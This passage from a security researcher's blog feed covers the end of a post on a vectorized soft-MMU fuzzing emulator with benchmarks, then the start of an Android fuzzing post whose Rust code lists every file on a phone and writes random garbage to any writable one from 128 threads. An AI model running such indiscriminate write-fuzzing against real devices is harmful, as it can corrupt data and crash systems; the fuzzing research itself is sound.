<p>These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.</p>
<p>These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.</p>
<p>The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Write: false | opsize: 1 | Diverge: false | Translate 37.8132 cycles | Access 10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate 39.0831 cycles | Access 11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate 39.7298 cycles | Access 10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate 35.2704 cycles | Access 9.6881 cycles
Write: true | opsize: 1 | Diverge: false | Translate 44.9504 cycles | Access 16.6908 cycles
Write: true | opsize: 2 | Diverge: false | Translate 45.9377 cycles | Access 15.0110 cycles
Write: true | opsize: 4 | Diverge: false | Translate 44.8083 cycles | Access 16.0191 cycles
Write: true | opsize: 8 | Diverge: false | Translate 39.7565 cycles | Access 8.6500 cycles
Write: false | opsize: 1 | Diverge: true | Translate 140.2084 cycles | Access 16.6964 cycles
Write: false | opsize: 2 | Diverge: true | Translate 141.0708 cycles | Access 16.7114 cycles
Write: false | opsize: 4 | Diverge: true | Translate 140.0859 cycles | Access 16.6728 cycles
Write: false | opsize: 8 | Diverge: true | Translate 137.5321 cycles | Access 14.1959 cycles
Write: true | opsize: 1 | Diverge: true | Translate 158.5673 cycles | Access 22.9880 cycles
Write: true | opsize: 2 | Diverge: true | Translate 159.3837 cycles | Access 21.2704 cycles
Write: true | opsize: 4 | Diverge: true | Translate 156.8409 cycles | Access 22.9207 cycles
Write: true | opsize: 8 | Diverge: true | Translate 156.7783 cycles | Access 16.6400 cycles
</code></pre></div></div>
<h4 id="performance-analysis">Performance analysis</h4>
<p>These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!</p>
<h1 id="tlbs-not-implemented-as-of-this-writing">TLBs (not implemented as of this writing)</h1>
<p>Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).</p>
<p>I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…</p>
<h1 id="fast-injectionpermission-modifications">Fast injection/permission modifications</h1>
<p>To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.</p>
<p>I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.</p>
<h4 id="vectorized-broadcast">Vectorized broadcast</h4>
<p>This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.</p>
<h4 id="vectorized-memset">Vectorized memset</h4>
<p>Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.</p>
<p>This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like <code class="language-plaintext highlighter-rouge">malloc()</code>.</p>
<h4 id="vectorized-write-multiple">Vectorized write-multiple</h4>
<p>This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.</p>
<p>Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.</p>
<h1 id="are-these-fast-routines-really-needed">Are these fast routines really needed?</h1>
<p>For example the benchmarks for the Rust implementation for a page table of shape: <code class="language-plaintext highlighter-rouge">[16, 16, 16, 13, 3]</code></p>
<p><em>Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0000 seconds
1 MiB of deduped memory added in 0.1873 seconds
1024 byte chunks read per second 30115.5741
1024 byte chunks written per second 29243.0394
1024 byte chunks memset per second 29340.3969
1024 byte chunks permed per second 34971.7952
1024 byte chunks write multiple per second 6864.1243
</code></pre></div></div>
<p>And the AVX-512 handwritten implementation on the same machine and same shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0000 seconds
1 MiB of deduped memory added in 0.1878 seconds
1024 byte chunks read per second 30073.5090
1024 byte chunks written per second 770678.8377
1024 byte chunks memset per second 777488.8143
1024 byte chunks permed per second 780162.1310
1024 byte chunks write multiple per second 751352.4038
</code></pre></div></div>
<p>Effectively a 25x speedup for the same result!</p>
<p>With a larger page size (<code class="language-plaintext highlighter-rouge">[16, 16, 16, 6, 10]</code>) this number goes down as I can use the old translation longer and I spend less time translating pages:</p>
<p>Rust implementations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0001 seconds
1 MiB of deduped memory added in 0.0829 seconds
1024 byte chunks read per second 30201.6634
1024 byte chunks written per second 31850.8188
1024 byte chunks memset per second 31818.1619
1024 byte chunks permed per second 34690.8332
1024 byte chunks write multiple per second 7345.5057
</code></pre></div></div>
<p>Hand-optimized implementations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Empty SoftMMU created in 0.0001 seconds
1 MiB of deduped memory added in 0.0826 seconds
1024 byte chunks read per second 30168.3047
1024 byte chunks written per second 32993840.4624
1024 byte chunks memset per second 33131493.5139
1024 byte chunks permed per second 36606185.6217
1024 byte chunks write multiple per second 10775641.4470
</code></pre></div></div>
<p>In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!</p>
<hr />
<h1 id="future-improvementsideas">Future improvements/ideas</h1>
<p>Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.</p>
<p>I could add more fast-injection routines as needed.</p>
<p>I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.</p>Writing the worlds worst Android fuzzer, and then improving it2018-10-18T09:57:20+00:002018-10-18T09:57:20+00:00https://gamozolabs.github.io/fuzzing/2018/10/18/terrible_android_fuzzer<p><em>So slimy it belongs in the slime tree</em></p>
<p><img src="/assets/slimetree.jpg" alt="Why" /></p>
<h1 id="changelog">Changelog</h1>
<table>
<thead>
<tr>
<th>Date</th>
<th>Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>2018-10-18</td>
<td>Initial</td>
</tr>
</tbody>
</table>
<h1 id="tweeter">Tweeter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.</p>
<h1 id="disclaimer">Disclaimer</h1>
<p>I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.</p>
<h1 id="give-me-the-code">Give me the code</h1>
<p><a href="https://github.com/gamozolabs/slime_tree">Slime Tree Repo</a></p>
<h1 id="intro">Intro</h1>
<p>Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.</p>
<p>When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into <code class="language-plaintext highlighter-rouge">/dev</code> and run <code class="language-plaintext highlighter-rouge">ls -l</code>, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.</p>
<p>To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use <code class="language-plaintext highlighter-rouge">adb shell</code> and thus we’re running as <code class="language-plaintext highlighter-rouge">u:r:shell:s0</code>.</p>
<h1 id="recursive-listdiring">Recursive listdiring</h1>
<p>Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Recursively list all files starting at the path specified by `dir`, saving</span>
<span class="c">/// all files to `output_list`</span>
<span class="k">fn</span> <span class="nf">listdirs</span><span class="p">(</span><span class="n">dir</span><span class="p">:</span> <span class="o">&</span><span class="n">Path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">:</span> <span class="o">&</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// List the directory</span>
<span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_dir</span><span class="p">(</span><span class="n">dir</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">list</span><span class="p">)</span> <span class="o">=</span> <span class="n">list</span> <span class="p">{</span>
<span class="c">// Go through each entry in the directory, if we were able to list the</span>
<span class="c">// directory safely</span>
<span class="k">for</span> <span class="n">entry</span> <span class="n">in</span> <span class="n">list</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">entry</span><span class="p">)</span> <span class="o">=</span> <span class="n">entry</span> <span class="p">{</span>
<span class="c">// Get the path representing the directory entry</span>
<span class="k">let</span> <span class="n">path</span> <span class="o">=</span> <span class="n">entry</span><span class="nf">.path</span><span class="p">();</span>
<span class="c">// Get the metadata and discard errors</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">metadata</span><span class="p">)</span> <span class="o">=</span> <span class="n">path</span><span class="nf">.symlink_metadata</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Skip this file if it's a symlink</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_symlink</span><span class="p">()</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Recurse if this is a directory</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_dir</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Add this to the directory listing if it's a file</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_file</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">can_read</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="k">let</span> <span class="n">can_write</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="n">output_list</span><span class="nf">.push</span><span class="p">((</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">dirlisting</span><span class="p">);</span>
</code></pre></div></div>
<h1 id="fuzzing">Fuzzing</h1>
<p>So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?</p>
<p>What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">listing</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">listing</span><span class="p">);</span>
<span class="c">// Fuzz buffer</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="c">// Fuzz forever</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="c">// Pick a random file</span>
<span class="k">let</span> <span class="n">rand_file</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">listing</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">)</span> <span class="o">=</span> <span class="o">&</span><span class="n">listing</span><span class="p">[</span><span class="n">rand_file</span><span class="p">];</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"{:?}</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_read</span> <span class="p">{</span>
<span class="c">// Fuzz by reading</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_write</span> <span class="p">{</span>
<span class="c">// Fuzz by writing</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.write</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When running this it pretty much stops right away, getting hung on things like <code class="language-plaintext highlighter-rouge">/sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe</code>. There are typically many <code class="language-plaintext highlighter-rouge">sysfs</code> and <code class="language-plaintext highlighter-rouge">procfs</code> files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.</p>
<p>How about we just make lets say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="n">crate</span> <span class="n">rand</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">sync</span><span class="p">::</span><span class="nb">Arc</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">OpenOptions</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::{</span><span class="n">Read</span><span class="p">,</span> <span class="n">Write</span><span class="p">};</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">path</span><span class="p">::{</span><span class="n">Path</span><span class="p">,</span> <span class="n">PathBuf</span><span class="p">};</span>
<span class="c">/// Maximum number of threads to fuzz with</span>
<span class="k">const</span> <span class="n">MAX_THREADS</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">128</span><span class="p">;</span>
<span class="c">/// Recursively list all files starting at the path specified by `dir`, saving</span>
<span class="c">/// all files to `output_list`</span>
<span class="k">fn</span> <span class="nf">listdirs</span><span class="p">(</span><span class="n">dir</span><span class="p">:</span> <span class="o">&</span><span class="n">Path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">:</span> <span class="o">&</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// List the directory</span>
<span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_dir</span><span class="p">(</span><span class="n">dir</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">list</span><span class="p">)</span> <span class="o">=</span> <span class="n">list</span> <span class="p">{</span>
<span class="c">// Go through each entry in the directory, if we were able to list the</span>
<span class="c">// directory safely</span>
<span class="k">for</span> <span class="n">entry</span> <span class="n">in</span> <span class="n">list</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">entry</span><span class="p">)</span> <span class="o">=</span> <span class="n">entry</span> <span class="p">{</span>
<span class="c">// Get the path representing the directory entry</span>
<span class="k">let</span> <span class="n">path</span> <span class="o">=</span> <span class="n">entry</span><span class="nf">.path</span><span class="p">();</span>
<span class="c">// Get the metadata and discard errors</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">metadata</span><span class="p">)</span> <span class="o">=</span> <span class="n">path</span><span class="nf">.symlink_metadata</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Skip this file if it's a symlink</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_symlink</span><span class="p">()</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Recurse if this is a directory</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_dir</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Add this to the directory listing if it's a file</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_file</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">can_read</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="k">let</span> <span class="n">can_write</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="n">output_list</span><span class="nf">.push</span><span class="p">((</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Fuzz thread worker</span>
<span class="k">fn</span> <span class="nf">worker</span><span class="p">(</span><span class="n">listing</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">>></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Fuzz buffer</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="c">// Fuzz forever</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">rand_file</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">listing</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">)</span> <span class="o">=</span> <span class="o">&</span><span class="n">listing</span><span class="p">[</span><span class="n">rand_file</span><span class="p">];</span>
<span class="c">//print!("{:?}\n", path);</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_read</span> <span class="p">{</span>
<span class="c">// Fuzz by reading</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_write</span> <span class="p">{</span>
<span class="c">// Fuzz by writing</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.write</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Optionally daemonize so we can swap from an ADB USB cable to a UART</span>
<span class="c">// cable and let this continue to run</span>
<span class="c">//daemonize();</span>
<span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">dirlisting</span><span class="p">);</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Created listing of {} files</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dirlisting</span><span class="nf">.len</span><span class="p">());</span>
<span class="c">// We wouldn't do anything without any files</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">dirlisting</span><span class="nf">.len</span><span class="p">()</span> <span class="o">></span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Directory listing was empty"</span><span class="p">);</span>
<span class="c">// Wrap it in an `Arc`</span>
<span class="k">let</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">dirlisting</span><span class="p">);</span>
<span class="c">// Spawn fuzz threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">MAX_THREADS</span> <span class="p">{</span>
<span class="c">// Create a unique arc reference for this thread and spawn the thread</span>
<span class="k">let</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="n">dirlisting</span><span class="nf">.clone</span><span class="p">();</span>
